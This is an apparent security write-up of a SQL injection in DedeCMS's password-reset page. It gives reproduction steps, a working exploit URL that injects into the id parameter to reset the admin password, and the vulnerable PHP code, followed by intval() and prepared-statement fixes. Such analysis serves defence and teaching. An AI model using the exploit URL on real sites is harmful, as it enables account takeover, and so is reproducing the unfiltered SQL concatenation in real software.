dedecms /member/resetpassword.php SQL Injection Vul
2023-09-27 14:28:11
Contents
1. Vulnerability description
2. Vulnerability trigger conditions
3. Vulnerability impact scope
4. Vulnerability code analysis
5. Defence methods
6. Offense and defence reflections
1. Vulnerability description
A SQL injection vulnerability in DedeCMS allows the password of any user to be changed.
2. Vulnerability trigger conditions
1. Register a user.
2. Go to password recovery and choose recovery via the security question: http://localhost/dedecms5.5/member/resetpassword.php
3. Fill in the information and click confirm.
4. Click confirm again; the browser is redirected to a URL of this form: http://localhost/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=2&key=zPnruOY7

// An attacker can then construct an EXP as follows
http://127.0.0.1/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=xx' or userid='admin' and '2&key=zPnruOY7&setp=2&pwd=111222&pwdok=111222
// Replace the 2 in the URL above with the id parameter from the redirect link obtained earlier, and replace key with the key parameter from that redirect link
// userid can then be changed to the user whose password is to be modified: admin
// pwd and pwdok are the password to set; they must be identical: md5(111222)=00b7691d86d96aebd21dd9e138f90840
Password changed successfully
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2010-042167
3. Vulnerability impact scope
4. Vulnerability code analysis
/member/resetpassword.php

```php
..
elseif($dopost == "getpasswd")
{
    // change password
    if(empty($id))
    {
        ShowMsg("对不起,请不要非法提交","login.php");
        exit();
    }
    // only the digits of $id are kept here
    $mid = ereg_replace("[^0-9]","",$id);
    $row = $db->GetOne("Select * From #@__pwd_tmp where mid = '$mid'");
    if(empty($row))
    {
        ShowMsg("对不起,请不要非法提交","login.php");
        exit();
    }
    if(empty($setp))
    {
        $tptim= (60*60*24*3);
        $dtime = time();
        if($dtime - $tptim > $row['mailtime'])
        {
            $db->executenonequery("DELETE FROM `#@__pwd_tmp` WHERE `md` = '$id';");
            ShowMsg("对不起,临时密码修改期限已过期","login.php");
            exit();
        }
        require_once(dirname(__FILE__)."/templets/resetpassword2.htm");
    }
    // the attack PoC enters this branch
    elseif($setp == 2)
    {
        if(isset($key))
        {
            $pwdtmp = $key;
        }
        $sn = md5(trim($pwdtmp));
        if($row['pwd'] == $sn)
        {
            if($pwd != "")
            {
                if($pwd == $pwdok)
                {
                    $pwdok = md5($pwdok);
                    $sql = "DELETE FROM `#@__pwd_tmp` WHERE `mid` = '$id';";
                    $db->executenonequery($sql);
                    // the raw $id (not the filtered $mid) is concatenated into the SQL without any filtering, giving an UPDATE injection
                    $sql = "UPDATE `#@__member` SET `pwd` = '$pwdok' WHERE `mid` = '$id';";
                    if($db->executenonequery($sql))
..
```
5. Defence methods
/member/resetpassword.php

```php
/* Normalise the $id variable */
$id = isset($id) ? intval($id) : 0;
/* */
```
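The root cause above is that the lookup uses the digit-filtered `$mid` while the DELETE and UPDATE use the raw `$id`. The following is an added example, not DedeCMS code, of the `setp == 2` branch rewritten so that `$id` is normalised once with `intval()` and that single integer is bound through prepared statements in every query; the table names `member` and `pwd_tmp`, the `resetPassword()` function and the in-memory SQLite database are assumptions made for this illustration.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database standing in for #@__member / #@__pwd_tmp.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE member (mid INTEGER PRIMARY KEY, userid TEXT, pwd TEXT)");
$db->exec("CREATE TABLE pwd_tmp (mid INTEGER, pwd TEXT, mailtime INTEGER)");
$db->exec("INSERT INTO member VALUES (1, 'admin', '" . md5('adminpass') . "')");
$db->exec("INSERT INTO member VALUES (2, 'alice', '" . md5('oldpass') . "')");
$db->exec("INSERT INTO pwd_tmp VALUES (2, '" . md5('zPnruOY7') . "', " . time() . ")");

/**
 * Hardened reset step (hypothetical helper). $id is reduced to one integer
 * and that same value is used for the lookup, the DELETE and the UPDATE.
 * md5() is kept only because it is the scheme the original code uses.
 * Returns true only when exactly the intended member row was updated.
 */
function resetPassword(PDO $db, string $id, string $key, string $pwd, string $pwdok): bool
{
    $mid = intval($id);                        // any non-numeric prefix yields 0
    if ($mid <= 0 || $pwd === '' || $pwd !== $pwdok) {
        return false;
    }
    $stmt = $db->prepare("SELECT pwd, mailtime FROM pwd_tmp WHERE mid = ?");
    $stmt->execute([$mid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Temporary key must exist, match, and be younger than three days.
    if (!$row || !hash_equals($row['pwd'], md5(trim($key)))
        || time() - 3 * 86400 > (int) $row['mailtime']) {
        return false;
    }
    $db->prepare("DELETE FROM pwd_tmp WHERE mid = ?")->execute([$mid]);
    $upd = $db->prepare("UPDATE member SET pwd = ? WHERE mid = ?");
    $upd->execute([md5($pwdok), $mid]);
    return $upd->rowCount() === 1;
}

// The id value from the write-up never reaches the UPDATE: intval() makes it 0.
var_dump(resetPassword($db, "xx' or userid='admin' and '2", 'zPnruOY7', '111222', '111222'));
// A legitimate request still works, and only alice's row (mid = 2) changes.
var_dump(resetPassword($db, '2', 'zPnruOY7', '111222', '111222'));
```

Applying the same `intval()` result to every query, rather than filtering for the SELECT and concatenating the raw value elsewhere, is the property worth checking in review of similar handlers.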
6. Offense and defence reflections
Copyright (c) 2015 LittleHann All rights reserved